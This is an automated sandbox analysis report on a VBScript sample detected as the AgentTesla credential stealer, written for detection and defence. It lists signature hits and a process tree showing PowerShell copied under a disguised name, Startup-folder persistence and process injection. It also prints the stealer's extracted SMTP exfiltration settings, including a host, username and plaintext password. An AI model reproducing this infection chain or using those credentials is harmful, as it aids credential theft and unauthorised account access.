Analysis Report: GRAINS.vbs (Windows)
Overview
General Information
Detection | Score | Range | Whitelisted | Confidence
---|---|---|---|---
AgentTesla | 100 | 0 - 100 | false | 100%
Signatures
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates processes via WMI
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4132 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GRAINS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- GRAINS.vbs.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\GRAINS.vbs.exe" -enc <base64-encoded PowerShell command line omitted> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- InstallUtil.exe (PID: 6536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cmd.exe (PID: 636 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\GRAINS.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5124 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xml.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 3120 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Xml.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 5504 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Xml.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Xml.vbs.exe (PID: 4884 cmdline: "C:\Users\user\AppData\Roaming\Xml.vbs.exe" -enc <base64-encoded PowerShell command line omitted> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- InstallUtil.exe (PID: 3776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
Rule | Description | Author
---|---|---
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Rule | Description | Author
---|---|---
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
System Summary
Source: | Author: Florian Roth (Nextron Systems):